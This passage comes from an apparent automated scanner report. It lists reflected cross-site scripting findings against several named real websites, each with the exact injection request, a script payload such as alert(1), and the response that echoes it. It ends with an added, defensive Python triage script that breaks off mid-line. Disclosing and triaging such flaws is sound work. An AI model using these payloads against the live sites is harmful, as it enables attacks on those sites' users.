User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:41 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: text/html; charset=utf-8
X-Runtime: 706
ETag: "3e44fe57bd9f1ca7ae2413ad405470b5"
Cache-Control: no-cache
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+he7kp7sk7c48bgofxgtgaayor1ghp%0A%3Avisit_start_time%3A+2011-04-02+12%3A44%3A41.415141+%2B00%3A00%0A%3Alast_page_load%3A+2011-04-02+12%3A44%3A41.415143+%2B00%3A00%0A; path=/; expires=Wed, 02-Apr-2036 12:44:41 GMT
Set-Cookie: vrid=e7021120-3f54-012e-d795-00237da0b95e; domain=.yellowpages.com; path=/; expires=Sat, 02-Apr-2016 12:44:41 GMT
Set-Cookie: _parity_session=BAh7BzoPc2Vzc2lvbl9pZCIlMDU2NjM2ZjQwZTU5NzkxM2ZmODBhZDg1OTkwOWNhYTM6E2RleF9zZXNzaW9uX2lkSSIpZTcwMzkwNjAtM2Y1NC0wMTJlLWQ3OTYtMDAyMzdkYTBiOTVlBjoGRUY%3D--9e7ac88334df5357779cb76d6b268bfc634f7ddf; path=/; HttpOnly
Set-Cookie: b=10010; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-e6a5db50-3f54-012e-19bb-00237da0b95e
Expires: Sat, 02 Apr 2011 12:44:40 GMT
Content-Length: 322976

<!DOCTYPE html>
<html>
<head>

<title>C496d<Img Src=A Onerror=Alert(1)>63985e825a0 - YP.COM</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="C496d&lt;Img Sr
...[SNIP]...
<h3 class="title">C496d<Img Src=A Onerror=Alert(1)>63985e825a0 Near You</h3>
...[SNIP]...

6.111. http://www.yourdictionary.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yourdictionary.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb5b"><script>alert(1)</script>8beaa66c83f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icobbb5b"><script>alert(1)</script>8beaa66c83f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yourdictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:58:33 GMT
Server: Apache
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=5184000
Expires: Wed, 01 Jun 2011 13:58:33 GMT
X-LTK-Server: yd-ec2-www
Content-Type: text/html
Content-Length: 8919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://www.yourdictionary.com/favicon.icobbb5b"><script>alert(1)</script>8beaa66c83f" />
...[SNIP]...

6.112. http://www.kcom.com/contact-us/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b99b"><script>alert(1)</script>ca9c0d3513d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=4b99b"><script>alert(1)</script>ca9c0d3513d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749251; expires=Sun, 01-Apr-2012 14:00:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:00:51 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<input type="hidden" id="00N300000055kEx" name="00N300000055kEx" title="Web-to-lead URL" value="KCOM Site - http://www.google.com/search?hl=en&q=4b99b"><script>alert(1)</script>ca9c0d3513d - ">
...[SNIP]...

6.113. http://www.canada.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.canada.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1d63'%3ba353fa99bdc was submitted in the REST URL parameter 1. This input was echoed as f1d63';a353fa99bdc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /f1d63'%3ba353fa99bdc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.canada.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www2.canada.com/f1d63';a353fa99bdc/index.html
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 13:41:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:41:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 3579

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www2.canada.com/f1d63';a353fa99bdc/index.html">here</a>.</h2>
</body></html>
<form name="frmPage" method="po
...[SNIP]...
-
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName='/canada/www.canada.com/f1d63';a353fa99bdc/index.html';
s.server=window.location.hostname.toLowerCase();
s.channel='Canada';
s.pageType='';
s.p
...[SNIP]...

6.114. http://www.multiply.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49add"style%3d"x%3aexpression(alert(1))"0c2a6539db2 was submitted in the REST URL parameter 1. This input was echoed as 49add"style="x:expression(alert(1))"0c2a6539db2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico49add"style%3d"x%3aexpression(alert(1))"0c2a6539db2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX1832OFBpGXmYZEphWmxtBesEf7vWbDUBZQ49XYidYzK4w%3d%3d:iczp3haayzcooqqmczt3pjm; domain=multiply.com; path=/
Set-Cookie: session=1301751465:1301751465:1301751465:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico49add"style="x:expression(alert(1))"0c2a6539db2
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 1245

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX1832OFBpGXmYZEphWmxtBesEf7vWbDUBZQ49XYidYzK4w%3d%3d:iczp3haayzcooqqmcz
...[SNIP]...
<A HREF="http://multiply.com/favicon.ico49add"style="x:expression(alert(1))"0c2a6539db2">
...[SNIP]...

6.115. http://www.multiply.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff3a1<script>alert(1)</script>1f3e33e8e25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX18sHkOwl6s9LDVYxCCmwXWdqKgJOM5Lx-aN.bAm4s-ZzA%3d%3d:0bp8odaayycooqqmczt3pjm; domain=multiply.com; path=/
Set-Cookie: session=1301751465:1301751465:1301751465:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 1245

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX18sHkOwl6s9LDVYxCCmwXWdqKgJOM5Lx-aN.bAm4s-ZzA%3d%3d:0bp8odaayycooqqmcz
...[SNIP]...
res=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
...[SNIP]...

6.116. http://www.multiply.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1f694<script>alert(1)</script>3af9c4679e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:40 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 757

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:40 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
...[SNIP]...

6.117. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c6c"><script>alert(1)</script>c18b021cdc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:31 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1">
...[SNIP]...

6.118. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5a1e2><script>alert(1)</script>0856dee6b4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:31 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...

6.119. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9fa44><script>alert(1)</script>ab167bca6cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...

6.120. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd1a5"><script>alert(1)</script>df47f8a83f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1">
...[SNIP]...

6.121. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3412a<script>alert(1)</script>af689436fa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?3412a<script>alert(1)</script>af689436fa3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:05:57 GMT
Location: http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 249

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1">http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1</a>
...[SNIP]...

6.122. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39dc7"><script>alert(1)</script>63b1fa46103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:05:57 GMT
Location: http://townhall.com/favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 253

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1">http://townhall.com/favicon.ico?39dc7"><sc
...[SNIP]...
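Every finding in this section carries the same two observations: where in the HTML the marker payload lands (plain text between tags, a double-quoted attribute value, an unquoted attribute value) and that the response is a redirect whose body a browser will not normally render. The following Python, added here as an example and not code from the XSS.CX report or from the scanner that produced it, makes that triage explicit: it parses a raw response, classifies each reflection of the payload in the body, and rates the finding "Information" when a 3xx with a Location header mitigates it and "High" when the page is actually rendered. The responses it runs against are constructed, shortened from the ones above, and the host names are placeholders.

```python
"""Triage a reflected-XSS finding from a raw HTTP response.

Added example, not code from the XSS.CX report or from Burp Suite: locate the
marker payload in the body, name its HTML context the way the report does, and
downgrade the finding when a 3xx with a Location header means the body is not
rendered.
"""
import re


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status_code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")   # Latin-1 never fails
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())  # first wins
    return status, headers, body.decode("iso-8859-1", "replace")


def context_at(body: str, idx: int) -> str:
    """Name the HTML context at offset idx in the report's own vocabulary."""
    before = body[:idx]
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt < 0 or gt > lt:
        return "text between tags"          # last tag closed before idx
    tag = before[lt:]                        # the tag we are inside
    eq = tag.rfind("=")
    if eq < 0:
        return "tag or attribute name"
    value = tag[eq + 1:].lstrip()            # attribute value being written
    if value.startswith('"') and value.count('"') % 2 == 1:
        return "attribute value in double quotes"
    if value.startswith("'") and value.count("'") % 2 == 1:
        return "attribute value in single quotes"
    if value and value[0] not in "\"'" and not re.search(r"\s", value):
        return "attribute value without quotes"
    return "tag or attribute name"           # previous value already closed


def reflection_contexts(body: str, payload: str) -> list:
    """Context of every verbatim reflection of payload, in document order."""
    return [context_at(body, m.start())
            for m in re.finditer(re.escape(payload), body)]


def assess(raw: bytes, payload: str) -> dict:
    """Rate one finding on the report's scale: 'Information' when the
    reflection sits in the body of a redirect, 'High' when it does not."""
    status, headers, body = parse_response(raw)
    contexts = reflection_contexts(body, payload)
    redirect = 300 <= status < 400 and "location" in headers
    if not contexts:
        severity = "none"
    elif redirect:
        severity = "Information"   # body not rendered unless the redirect is defeated
    else:
        severity = "High"          # ordinary reflected XSS
    return {"status": status, "redirect": redirect,
            "contexts": contexts, "severity": severity}


# Constructed samples shortened from the responses in the report; the host
# names are placeholders.
PAYLOAD_TEXT = "ff3a1<script>alert(1)</script>1f3e33e8e25"
PAYLOAD_ATTR = '91c6c"><script>alert(1)</script>c18b021cdc1'

# 302 whose body repeats the headers (as the mod_perl responses above do), so
# the Location line, payload included, lands in the body as text between tags.
REDIRECT_TEXT = (
    b"HTTP/1.1 302 Found\r\nContent-Type: text/html; charset=utf-8\r\n"
    b"Location: http://redirect.example/favicon.ico" + PAYLOAD_TEXT.encode()
    + b"\r\n\r\nHTTP/1.1 302 Found\r\n"
    b"Location: http://redirect.example/favicon.ico" + PAYLOAD_TEXT.encode()
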